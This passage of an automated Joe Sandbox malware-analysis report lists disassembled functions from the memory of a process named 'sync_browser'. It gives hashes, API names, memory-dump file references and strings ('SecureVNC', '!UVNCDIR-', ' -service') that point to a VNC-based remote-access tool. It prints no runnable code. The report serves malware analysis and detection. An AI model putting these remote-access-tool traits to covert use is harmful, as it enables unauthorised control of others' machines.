                                                                    • Instruction ID: 662dc0ed30f9758884ef096cebab0c83f3eca0855b41203f6eb26328d1d763ba
                                                                    • Opcode Fuzzy Hash: a8d2708ae87b95b4ee220a0a01a88b12f7926cd03621c5a20977671bdb7db4c5
                                                                    • Instruction Fuzzy Hash: 8EF04921E0E02AE5FA54AB12CC41FBC1A68EF45B00F88023BEA0C873D2DE1CA476D711
                                                                    Function 00007FF6DC0CAED0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: htonl
                                                                    • String ID: .$.
                                                                    • API String ID: 2009864989-3769392785
                                                                    • Opcode ID: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                                    • Instruction ID: 72d11cc78c9c6e69b28e92aea4df25528411949d9f82227e00161f8116a6d3c9
                                                                    • Opcode Fuzzy Hash: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                                    • Instruction Fuzzy Hash: 89411551E0C2AA48F7205A76DA5027E7AD85F42754F386133DE6AC22C7CF3ED4278321
                                                                    Function 00007FF6DC0EC090 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89memoryfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocDeleteFileGlobal_errno_invalid_parameter_noinfo
                                                                    • String ID: !UVNCDIR-
                                                                    • API String ID: 2642416944-2720985186
                                                                    • Opcode ID: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
                                                                    • Instruction ID: ce3883a1f788466e4d51938962a566408054dee73214793604285093f36569fa
                                                                    • Opcode Fuzzy Hash: 06c9f7cff8713e7e821de9c1934e86ea9f9c841a539949df6008114534a2a042
                                                                    • Instruction Fuzzy Hash: 5641933161CBC581EB268B20E8143FD6795EB86B80F445172DA9D877C6DF2DD62BC700
                                                                    Function 00007FF6DC179748 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                    • String ID: B
                                                                    • API String ID: 2959964966-1255198513
                                                                    • Opcode ID: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                    • Instruction ID: afdd3747990cd206b8001c34637dfc1baa052a9d10fa6cf5f835a9492913d573
                                                                    • Opcode Fuzzy Hash: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                    • Instruction Fuzzy Hash: 5B315F32E1863AC9E7119F65E8405AD36A8BB087A8F540137EE1D93BD8DE38D467D700
                                                                    Function 00007FF6DC184AFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                    • String ID: SecureVNC;0;0x%08x;%s
                                                                    • API String ID: 2959964966-2465057312
                                                                    • Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                    • Instruction ID: 47ed17a3d0ee090da14c529209d9d1a011d9ae601de35723856c98a12cd2ddee
                                                                    • Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                    • Instruction Fuzzy Hash: BF219332B1877599E711CF61AC509AD76A9BF0CBA8B590137FE5C93B88CE38D412C340
                                                                    Function 00007FF6DC0D2FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentDirectoryFileModuleName
                                                                    • String ID: " -service
                                                                    • API String ID: 3981628254-877726483
                                                                    • Opcode ID: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                    • Instruction ID: b5fc09df4f56688e69f82ba7b92ddb45e43795d0fe6994040f4d03586071f666
                                                                    • Opcode Fuzzy Hash: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                    • Instruction Fuzzy Hash: 8C319C21A08AC581E7218B20AC553BE37A4FFC8354F848333DAAD836D5DE2CE126CB10
                                                                    Function 00007FF6DC1789E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                    • String ID: B
                                                                    • API String ID: 2959964966-1255198513
                                                                    • Opcode ID: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                                    • Instruction ID: c044c60309643075d42fd2dd042e622a9e828cc1874e4a479ca520d11280d819
                                                                    • Opcode Fuzzy Hash: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                                    • Instruction Fuzzy Hash: 00119032A1876586E7209B15E84026DB6A4FB88B94F584332EB8D97BC5CE3CD552DB04
                                                                    Function 00007FF6DC0D3EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileModuleNamePlaySound
                                                                    • String ID: ding_dong.wav
                                                                    • API String ID: 3032721342-215479118
                                                                    • Opcode ID: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                                    • Instruction ID: bc23d4635a1c93750babe3e8762031b4e3ff7bd080e8a41b04237dcd51172b6b
                                                                    • Opcode Fuzzy Hash: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                                    • Instruction Fuzzy Hash: B8115121B08A5981E7249B35F95136E62A4FB88760F404337EA7CC76D4DF3CD126CB00
                                                                    Function 00007FF6DC0D41E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Item$MessageSend_errno_invalid_parameter_noinfo
                                                                    • String ID: <
                                                                    • API String ID: 2439412506-4251816714
                                                                    • Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                    • Instruction ID: 518ed335f7a3951b217b55277b2c87ecc738194abacd585bc66f9b87a7707769
                                                                    • Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                    • Instruction Fuzzy Hash: BD118F32A18A5586E7509F12F8107AEB364FBC8B44F545132EB8D47B55CF3CD916CB40
                                                                    Function 00007FF6DC178B14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                    • String ID: I
                                                                    • API String ID: 2959964966-3707901625
                                                                    • Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                    • Instruction ID: cd59edaaaf022f1468b0ad10ba6f03b6fd33250630bc3d9390d83143573da2c5
                                                                    • Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                    • Instruction Fuzzy Hash: 33119E72A08B5485EB109B12E94026DB6A8FB98FE0F184232EA9D57BD5CE3CD512CB00
                                                                    Function 00007FF6DC0DFF00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: getpeernameinet_ntoa
                                                                    • String ID: <unavailable>
                                                                    • API String ID: 1982201544-1096956887
                                                                    • Opcode ID: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                                    • Instruction ID: f7eb2ca595912cf3c38fa1a777bb882bd17b3b626b3246b45c1ea0c9290e4d88
                                                                    • Opcode Fuzzy Hash: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                                    • Instruction Fuzzy Hash: 610180B2A0964982EF509B10E89536D73A4FB88B89F444032EA4E8B764DF3CD566CB00
                                                                    Function 00007FF6DC0CD9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$MappingOpenView
                                                                    • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                    • API String ID: 3439327939-3305976270
                                                                    • Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                    • Instruction ID: cc0d7c9676197fdf2af3e1bde5c22f2155c79256f30d1373609cf7bd07992d12
                                                                    • Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                    • Instruction Fuzzy Hash: 29018E32509B94C6E720CB65F44176EB3A4FB84B64F484236D6AA42B94CF7CD462C790
                                                                    Function 00007FF6DC0CDA70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$MappingOpenView
                                                                    • String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
                                                                    • API String ID: 3439327939-2897898322
                                                                    • Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                    • Instruction ID: 03d722647af874695cba954238835cb2b71ab9b5aa5df9bd538109719f99b59a
                                                                    • Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                    • Instruction Fuzzy Hash: 8C018E32508B9486E720CBA5E40076EB3A4FB88B64F450336DAAA43B94CF7CD062C750
                                                                    Function 00007FF6DC0CA200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
